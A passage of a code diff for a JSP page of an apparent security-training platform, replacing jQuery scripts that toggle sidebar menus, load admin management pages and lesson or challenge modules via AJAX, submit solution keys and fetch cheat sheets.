-                    + ajaxCall.statusText
-                    + "</p>");
-            }
-            $("#solutionDiv").show("fast");
-        });
-    });
-    <%}%>
-    $(".successAlert").click(function () {
-        alert("successAlert click");
-        $(this).hide("slide", {
-            direction: "left"
-        }, 1000);
-    });
-
-    $(".errorAlert").click(function () {
-        $(this).hide("slide", {
-            direction: "left"
-        }, 1000);
-    });
-
-    function openFloorToggleFunctions() {
-        console.log("Enabling Open Floor Toggle Funtions");
-
-        $("#lessonList").click(function () {
-            $("#theLessonList").toggle("slow");
-            $("#theChallengeList").hide("fast");
-            $("#theAdminList").hide("fast");
-        });
-
-        $("#challengeList").click(function () {
-            $("#theChallengeList").toggle("slow");
-            $("#theLessonList").hide("fast");
-            $("#theAdminList").hide("fast");
-        });
-
-        $(".challengeHeader").click(function () {
-            $(".challengeList").hide("fast");
-            $(this).parent().find(".challengeList").show("slow");
-        });
-    }
-
-    openFloorToggleFunctions();
-
-    function tournamentToggleFunctions() {
-        console.log("Enablig Tournament Toggle Functions");
-
-        $("#fieldTrainingList").click(function () {
-            $("#theFieldTrainingList").toggle("slow");
-            $("#theCorporalList").hide("fast");
-            $("#theSergeantList").hide("fast");
-            $("#theMajorList").hide("fast");
-            $("#theAdmiralList").hide("fast");
-            $("#thePrivateList").hide("fast");
-            $("#theLieutenantList").hide("fast");
-        });
-
-        $("#privateList").click(function () {
-            $("#thePrivateList").toggle("slow");
-            $("#theCorporalList").hide("fast");
-            $("#theSergeantList").hide("fast");
-            $("#theMajorList").hide("fast");
-            $("#theAdmiralList").hide("fast");
-            $("#theFieldTrainingList").hide("fast");
-            $("#theLieutenantList").hide("fast");
-        });
-
-        $("#corporalList").click(function () {
-            $("#theCorporalList").toggle("slow");
-            $("#theFieldTrainingList").hide("fast");
-            $("#theSergeantList").hide("fast");
-            $("#theMajorList").hide("fast");
-            $("#theAdmiralList").hide("fast");
-            $("#thePrivateList").hide("fast");
-            $("#theLieutenantList").hide("fast");
-        });
-
-        $("#sergeantList").click(function () {
-            $("#theSergeantList").toggle("slow");
-            $("#theFieldTrainingList").hide("fast");
-            $("#theCorporalList").hide("fast");
-            $("#theMajorList").hide("fast");
-            $("#theAdmiralList").hide("fast");
-            $("#thePrivateList").hide("fast");
-            $("#theLieutenantList").hide("fast");
-        });
-
-        $("#lieutenantList").click(function () {
-            $("#theLieutenantList").toggle("slow");
-            $("#theFieldTrainingList").hide("fast");
-            $("#theCorporalList").hide("fast");
-            $("#theSergeantList").hide("fast");
-            $("#theAdmiralList").hide("fast");
-            $("#thePrivateList").hide("fast");
-            $("#theMajorList").hide("fast");
-        });
-
-        $("#majorList").click(function () {
-            $("#theMajorList").toggle("slow");
-            $("#theFieldTrainingList").hide("fast");
-            $("#theCorporalList").hide("fast");
-            $("#theSergeantList").hide("fast");
-            $("#theAdmiralList").hide("fast");
-            $("#thePrivateList").hide("fast");
-            $("#theLieutenantList").hide("fast");
-        });
-
-        $("#admiralList").click(function () {
-            $("#theAdmiralList").toggle("slow");
-            $("#theFieldTrainingList").hide("fast");
-            $("#theCorporalList").hide("fast");
-            $("#theSergeantList").hide("fast");
-            $("#theMajorList").hide("fast");
-            $("#thePrivateList").hide("fast");
-            $("#theLieutenantList").hide("fast");
-        });
-    }
-
-    <%if (ModulePlan.isTournamentFloor()) {%>
-    tournamentToggleFunctions();
-    <%}%>
-
-    function resizeSidebar() {
-        //Make Sidebar as Long as Page
-        if ($("#contentDiv").height() > 700) {
-            console.log("Updating Sidebar Length to "
-                + $("#contentDiv").height());
-            $("#theSidebarWrapper").height($("#contentDiv").height());
-        } else {
-            console.log("Setting Sidebar to 130% because  "
-                + $("#contentDiv").height() + "px is too short.");
-            $("#theSidebarWrapper").height("130%");
-        }
-    }
-</script>
-<script>
-    (function ($) {
-        $(window).load(function () {
-            console.log("Initialising Custom Scrollbars (If Any)");
-            $(".levelList").mCustomScrollbar({
-                theme: "dark-thin",
-                mouseWheel: {
-                    scrollAmount: 120
-                }
-            });
-        });
-    })(jQuery);
-
-    function startScrollsBars() {
-        console.log("Initialising Custom Scrollbars Again (If Any)");
-        $(".levelList").mCustomScrollbar({
-            theme: "dark-thin",
-            mouseWheel: {
-                scrollAmount: 120
-            }
-        });
-    }
-</script>
-<!-- <fmt:message key="generic.text.commentMessage.1" />
+				</div>
+				<!-- End of Sidebar -->
+			</div>
+			<!-- End of Sidebar Wrapper -->
+		</div>
+	</div>
+	<script>
+		$("#contentDiv").load("getStarted.jsp", function(response, status, xhr) {
+			if (status == "error") {
+			var msg = "Sorry but there was an error: ";
+			$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+		  }
+		});
+		</script>
+
+	<% //Hide UI Scripts from Users (Blocked at session level anyway, just stops spiders finding the links)
+		if (userRole.compareTo("admin") == 0){ %>
+	<script src="js/adminToggle.js"></script>
+	<script>
+
+			$("#updatePlayerScoreLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/userManagement/givePoints.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+
+			$("#suspendPlayerLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/userManagement/suspendUser.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+
+			$("#unSuspendPlayerLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/userManagement/unSuspendUser.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+
+			$("#changePlayerPasswordLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/userManagement/changeUserPassword.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+
+			$("#createNewAdminLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/userManagement/createNewAdmin.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+
+			$("#createNewClassLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/userManagement/createNewClass.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+
+			$("#addPlayersLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/userManagement/addPlayers.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+			
+			$("#deletePlayersLink").click(function(){
+			   $("#submitResult").slideUp("fast", function(){
+			       $("#contentDiv").hide("fast", function(){
+			           $("#contentDiv").load("admin/userManagement/deletePlayers.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+			             if (status == "error") {
+			                   var msg = "<fmt:message key="generic.text.sorryError" />: ";
+			                   $("#contentDiv").html("<p" + msg + xhr.status + " " + xhr.statusText + "</p");
+			             }
+			             $("#contentDiv").show("fast");
+			           });
+			       });
+			   });
+			});
+
+			$("#assignPlayersLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/userManagement/assignPlayers.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+
+			$("#setDefaultClassForRegistrationLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/userManagement/setDefaultClassForRegistration.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+
+			$("#upgradePlayersLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/userManagement/upgradePlayers.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+			
+			$("#downgradeAdminLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/userManagement/downgradeAdmins.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});			
+
+			$("#feedbackLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/moduleManagement/feedback.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+
+			$("#setModuleStatusLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/moduleManagement/setStatus.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+
+			$("#openCloseByCategory").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/moduleManagement/openCloseByCategory.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});
+				});	
+			});
+
+			$("#registrationLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/config/updateRegistration.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+
+			$("#progressLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/moduleManagement/classProgress.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+
+			$("#scoreboardLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/config/scoreboard.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+
+			$("#moduleBlockLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/moduleManagement/moduleBlock.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+
+			$("#setCoreDatabaseLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/config/setCoreDatabase.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});	
+				});
+			});
+
+			$("#configureFeedbackLink").click(function(){
+					$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/config/configFeedback.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});
+				});	
+			});
+			
+			$("#aboutShepherdLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/config/aboutShepherd.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});
+				});	
+			});
+			
+			$("#cheatSheetLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/config/configCheats.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});
+				});	
+			});
+			
+			$("#levelLayoutLink").click(function(){
+				$("#submitResult").slideUp("fast", function(){
+					$("#contentDiv").hide("fast", function(){
+						$("#contentDiv").load("admin/moduleManagement/changeLevelLayout.jsp?csrfToken=<%= csrfJsToken %>", function(response, status, xhr) {
+						  if (status == "error") {
+							var msg = "<fmt:message key="generic.text.sorryError" />: ";
+							$("#contentDiv").html("<p>" + msg + xhr.status + " " + xhr.statusText + "</p>");
+						  }
+						  $("#contentDiv").show("fast");
+						});
+					});
+				});	
+			});
+			</script>
+	<%
+		}
+	%>
+
+	<script>
+			function applyMenuButtonActionsOpenOrTourney(theCsrfToken, theErrorMessage){
+				console.log("Applying Menu Actions For Open/Tourney");
+				
+				$(".challenge").click(function(){
+					var whatFile = $(this).attr('id');
+					$("#currentModule").val(whatFile);
+					var theActualFile = "";
+					$("#solutionDiv").hide("fast");
+					$("#contentDiv").slideUp("slow", function(){
+						var ajaxCall = $.ajax({
+							type: "POST",
+							url: "getModule",
+							data: {
+								moduleId: whatFile,
+								csrfToken: theCsrfToken
+							},
+							async: false
+						});
+						if(ajaxCall.status == 200)
+						{
+							theActualFile = ajaxCall.responseText;
+							$('#contentDiv').html("<iframe frameborder='no' class='levelIframe' id='theChallenge' src='" + theActualFile + "'></iframe>");
+							$("#theChallenge").load(function(){
+								<%if (showCheatSheet) {%>
+									$("#submitResult").slideDown("fast", function(){
+										$("#cheatSheetButton").slideDown("fast", function(){
+											$("#contentDiv").slideDown("slow", function(){
+												var scrollTo = $("#moduleResult").offset().top;
+												scrollTo = scrollTo - 60;
+												console.log("Scroll Up to: " + scrollTo);
+												$('html, body').animate({
+													scrollTop: scrollTo
+												}, 1000);
+											});
+										});
+									});
+								<%} else {%>
+									$("#submitResult").slideDown("fast", function(){
+										$("#contentDiv").slideDown("slow", function(){
+											var scrollTo = $("#moduleResult").offset().top;
+											scrollTo = scrollTo - 60;
+											console.log("Scroll Up to: " + scrollTo);
+											$('html, body').animate({
+												scrollTop: scrollTo
+											}, 1000);
+										});
+									});
+								<%}%>
+							}).appendTo('#contentDiv');
+							$("#theSidebarWrapper").height($("#contentDiv").height());
+						}
+						else
+						{
+							$('#contentDiv').html("<p> <fmt:message key="generic.text.sorryError" />: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+							$("#contentDiv").slideDown("slow");
+						}
+					});
+				});	
+		
+				$(".lesson").click(function(){
+					var whatFile = $(this).attr('id');
+					$("#currentModule").val(whatFile);
+					var theActualFile = "";
+					$("#solutionDiv").hide("fast");
+					$("#contentDiv").slideUp("slow", function(){
+						var ajaxCall = $.ajax({
+							type: "POST",
+							url: "getModule",
+							data: {
+								moduleId: whatFile,
+								csrfToken: theCsrfToken
+							},
+							async: false
+						});
+						if(ajaxCall.status == 200)
+						{
+							theActualFile = ajaxCall.responseText;
+							$('#contentDiv').html("<iframe frameborder='no' class='levelIframe' id='theLesson' src='" + theActualFile + "'></iframe>");
+							$("#theLesson").load(function(){
+							<%if (showCheatSheet) {%>
+								$("#submitResult").slideDown("fast", function(){
+									$("#cheatSheetButton").slideDown("fast", function(){
+										$("#contentDiv").slideDown("slow", function(){
+											var scrollTo = $("#moduleResult").offset().top;
+											scrollTo = scrollTo - 60;
+											console.log("Scroll Up to: " + scrollTo);
+											$('html, body').animate({
+												scrollTop: scrollTo
+											}, 1000);
+										});
+									});
+								});
+							<%} else {%>
+								$("#submitResult").slideDown("fast", function(){
+									$("#contentDiv").slideDown("slow", function(){
+										var scrollTo = $("#moduleResult").offset().top;
+										scrollTo = scrollTo - 60;
+										console.log("Scroll Up to: " + scrollTo);
+										$('html, body').animate({
+											scrollTop: scrollTo
+										}, 1000);
+									});
+								});
+							<%}%>
+							}).appendTo('#contentDiv');
+							$("#theSidebarWrapper").height($("#contentDiv").height());
+						}
+						else
+						{
+							$('#contentDiv').html("<p> <fmt:message key="generic.text.sorryError" />: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+							$("#contentDiv").slideDown("slow");
+						}
+					});
+				});
+			}
+			
+			function applyMenuButtonActionsCtfMode(theCsrfToken, theErrorMessage){
+				console.log("Applying JS Functions to Incremental Menu Buttons");
+				
+				$("#completedList").click(function () {
+					$("#theCompletedList").toggle("slow");
+					$("#theUncompletedList").hide("fast");
+					$("#theAdminList").hide("fast");
+				});
+		
+				$("#uncompletedList").click(function () {
+					$("#theUncompletedList").toggle("slow");
+					$("#theCompletedList").hide("fast");
+					$("#theAdminList").hide("fast");
+				});
+		
+				$(".lesson").click(function(){
+					var whatFile = $(this).attr('id');	
+					$("#currentModule").val(whatFile);	
+					var theActualFile = "";	
+					$("#solutionDiv").hide("fast");	
+					$("#contentDiv").slideUp("slow", function(){
+						var ajaxCall = $.ajax({
+							type: "POST",
+							url: "getModule",
+							data: {
+								moduleId: whatFile,
+								csrfToken: theCsrfToken
+							},
+						async: false
+						});
+						if(ajaxCall.status == 200) {
+							theActualFile = ajaxCall.responseText;
+							$('#contentDiv').html("<iframe frameborder='no' class='levelIframe' id='theLesson' src='" + theActualFile + "'></iframe>");
+							$("#theLesson").load(function(){
+								<%if (showCheatSheet) {%>
+									$("#submitResult").slideDown("fast", function(){
+										$("#cheatSheetButton").slideDown("fast", function(){
+											$("#contentDiv").slideDown("slow", function(){
+												var scrollTo = $("#moduleResult").offset().top;
+												scrollTo = scrollTo - 60;
+												console.log("Scroll Up to: " + scrollTo);
+												$('html, body').animate({
+													scrollTop: scrollTo
+												}, 1000);
+											});
+										});
+									});
+									<%} else {%>
+									$("#submitResult").slideDown("fast", function(){
+										$("#contentDiv").slideDown("slow", function(){
+											var scrollTo = $("#moduleResult").offset().top;
+											scrollTo = scrollTo - 60;
+											console.log("Scroll Up to: " + scrollTo);
+											$('html, body').animate({
+												scrollTop: scrollTo
+											}, 1000);
+										});
+									});
+								<%}%>
+							}).appendTo('#contentDiv');
+						} else {
+							$('#contentDiv').html("<p> " + theErrorMessage + ": " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+							$("#contentDiv").slideDown("slow");
+						}
+					});
+				});
+			}
+		<%if (ModulePlan.isIncrementalFloor()) {%>
+			applyMenuButtonActionsCtfMode('<%=Encode.forHtml(csrfToken)%>', "<fmt:message key="generic.text.sorryError"/>");
+		<%} //End of if(CTF Mode Enabled)%>
+		<%if (!ModulePlan.isIncrementalFloor()) {%>
+			applyMenuButtonActionsOpenOrTourney('<%=Encode.forHtml(csrfToken)%>', "<fmt:message key="generic.text.sorryError"/>");
+		<%} // End of Not CTF Mode If%>
+		//RefreshModuleFormScript
+		function refreshSideMenu(theCsrfToken, localErrorMessage){
+			$("#menuRefreshLoadingDiv").show("fast");
+			$("#sideMenuWrapper").slideUp("fast", function(){
+				var ajaxCall = $.ajax({
+					type: "POST",
+					url: "refreshMenu",
+					data: {
+						csrfToken: theCsrfToken
+					},
+					async: false
+				});
+				$("#menuRefreshLoadingDiv").slideUp("fast", function(){
+					if(ajaxCall.status == 200)
+					{
+						$("#sideMenuWrapper").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#sideMenuWrapper").append("<br/><font color='red'>" + localErrorMessage + ": " + ajaxCall.status + "</font>");
+					}
+					$('#sideMenuWrapper').slideDown('slow');
+				});
+			});
+		}
+
+		$("#resultForm").submit(function(){
+			var theKey = $("#moduleResult").val();
+			var theModuleId = $("#currentModule").val();
+			if(theKey != null)
+			{
+				$("#submitLoading").slideDown("fast");
+				$("#solutionDiv").slideUp("fast");
+				$("#resultResponse").slideUp("fast");
+				$("#submitForm").slideUp("fast");
+				//The Ajax Operation
+				$("#contentDiv").slideUp("fast", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "solutionSubmit",
+						data: {
+							moduleId: theModuleId,
+							solutionKey: theKey,
+							csrfToken: "<%=csrfToken%>"
+						},
+						async: false
+					});
+					$("#submitLoading").slideUp("fast", function(){
+						if(ajaxCall.status == 200)
+						{
+							console.log("Request OK. Showing Reponse");
+							$('#contentDiv').html(ajaxCall.responseText);
+						}
+						else
+						{
+							$('#resultResponse').html("<br/><p> <fmt:message key="generic.text.sorryError" />: " + ajaxCall.status + " " + ajaxCall.statusText + "</p><br/>");
+							$("#resultResponse").show("slow");
+						}
+						$("#moduleResult").val("");
+						$("#submitForm").slideDown("slow");
+						$("#contentDiv").slideDown("slow");
+					});
+				});
+			}
+			else
+			{
+				console.log("No Key Submitted");
+			}
+		});
+		
+		<%if (showCheatSheet) {%>
+		$("#showSolution").click(function(){
+			$("#solutionDiv").hide("fast", function(){
+				var theModuleId = $("#currentModule").val();
+				var ajaxCall = $.ajax({
+					type: "POST",
+					url: "getCheat",
+					data: {
+						moduleId: theModuleId,
+						csrfToken: "<%=csrfToken%>"
+									},
+									async : false
+								});
+								if (ajaxCall.status == 200) {
+									$('#solutionDiv').html(
+											ajaxCall.responseText);
+								} else {
+									$('#solutionDiv').html(
+											"<p> <fmt:message key="generic.text.sorryError" />: "
+													+ ajaxCall.status + " "
+													+ ajaxCall.statusText
+													+ "</p>");
+								}
+								$("#solutionDiv").show("fast");
+							});
+				});
+	<%}%>
+		$(".successAlert").click(function() {
+			alert("successAlert click");
+			$(this).hide("slide", {
+				direction : "left"
+			}, 1000);
+		});
+
+		$(".errorAlert").click(function() {
+			$(this).hide("slide", {
+				direction : "left"
+			}, 1000);
+		});
+
+		function openFloorToggleFunctions() {
+			console.log("Enabling Open Floor Toggle Funtions");
+
+			$("#lessonList").click(function() {
+				$("#theLessonList").toggle("slow");
+				$("#theChallengeList").hide("fast");
+				$("#theAdminList").hide("fast");
+			});
+
+			$("#challengeList").click(function() {
+				$("#theChallengeList").toggle("slow");
+				$("#theLessonList").hide("fast");
+				$("#theAdminList").hide("fast");
+			});
+
+			$(".challengeHeader").click(function() {
+				$(".challengeList").hide("fast");
+				$(this).parent().find(".challengeList").show("slow");
+			});
+		}
+		openFloorToggleFunctions();
+
+		function tournamentToggleFunctions() {
+			console.log("Enablig Tournament Toggle Functions");
+
+			$("#fieldTrainingList").click(function() {
+				$("#theFieldTrainingList").toggle("slow");
+				$("#theCorporalList").hide("fast");
+				$("#theSergeantList").hide("fast");
+				$("#theMajorList").hide("fast");
+				$("#theAdmiralList").hide("fast");
+				$("#thePrivateList").hide("fast");
+				$("#theLieutenantList").hide("fast");
+			});
+
+			$("#privateList").click(function() {
+				$("#thePrivateList").toggle("slow");
+				$("#theCorporalList").hide("fast");
+				$("#theSergeantList").hide("fast");
+				$("#theMajorList").hide("fast");
+				$("#theAdmiralList").hide("fast");
+				$("#theFieldTrainingList").hide("fast");
+				$("#theLieutenantList").hide("fast");
+			});
+
+			$("#corporalList").click(function() {
+				$("#theCorporalList").toggle("slow");
+				$("#theFieldTrainingList").hide("fast");
+				$("#theSergeantList").hide("fast");
+				$("#theMajorList").hide("fast");
+				$("#theAdmiralList").hide("fast");
+				$("#thePrivateList").hide("fast");
+				$("#theLieutenantList").hide("fast");
+			});
+
+			$("#sergeantList").click(function() {
+				$("#theSergeantList").toggle("slow");
+				$("#theFieldTrainingList").hide("fast");
+				$("#theCorporalList").hide("fast");
+				$("#theMajorList").hide("fast");
+				$("#theAdmiralList").hide("fast");
+				$("#thePrivateList").hide("fast");
+				$("#theLieutenantList").hide("fast");
+			});
+
+			$("#lieutenantList").click(function() {
+				$("#theLieutenantList").toggle("slow");
+				$("#theFieldTrainingList").hide("fast");
+				$("#theCorporalList").hide("fast");
+				$("#theSergeantList").hide("fast");
+				$("#theAdmiralList").hide("fast");
+				$("#thePrivateList").hide("fast");
+				$("#theMajorList").hide("fast");
+			});
+
+			$("#majorList").click(function() {
+				$("#theMajorList").toggle("slow");
+				$("#theFieldTrainingList").hide("fast");
+				$("#theCorporalList").hide("fast");
+				$("#theSergeantList").hide("fast");
+				$("#theAdmiralList").hide("fast");
+				$("#thePrivateList").hide("fast");
+				$("#theLieutenantList").hide("fast");
+			});
+
+			$("#admiralList").click(function() {
+				$("#theAdmiralList").toggle("slow");
+				$("#theFieldTrainingList").hide("fast");
+				$("#theCorporalList").hide("fast");
+				$("#theSergeantList").hide("fast");
+				$("#theMajorList").hide("fast");
+				$("#thePrivateList").hide("fast");
+				$("#theLieutenantList").hide("fast");
+			});
+		}
+	<%if (ModulePlan.isTournamentFloor()) {%>
+		tournamentToggleFunctions();
+	<%}%>
+		function resizeSidebar() {
+			//Make Sidebar as Long as Page
+			if ($("#contentDiv").height() > 700) {
+				console.log("Updating Sidebar Length to "
+						+ $("#contentDiv").height());
+				$("#theSidebarWrapper").height($("#contentDiv").height());
+			} else {
+				console.log("Setting Sidebar to 130% because  "
+						+ $("#contentDiv").height() + "px is too short.");
+				$("#theSidebarWrapper").height("130%");
+			}
+		}
+	</script>
+	<script>
+		(function($) {
+			$(window).load(function() {
+				console.log("Initialising Custom Scrollbars (If Any)");
+				$(".levelList").mCustomScrollbar({
+					theme : "dark-thin",
+					mouseWheel : {
+						scrollAmount : 120
+					}
+				});
+			});
+		})(jQuery);
+
+		function startScrollsBars() {
+			console.log("Initialising Custom Scrollbars Again (If Any)");
+			$(".levelList").mCustomScrollbar({
+				theme : "dark-thin",
+				mouseWheel : {
+					scrollAmount : 120
+				}
+			});
+		}
+	</script>
+	<!-- <fmt:message key="generic.text.commentMessage.1" /> 
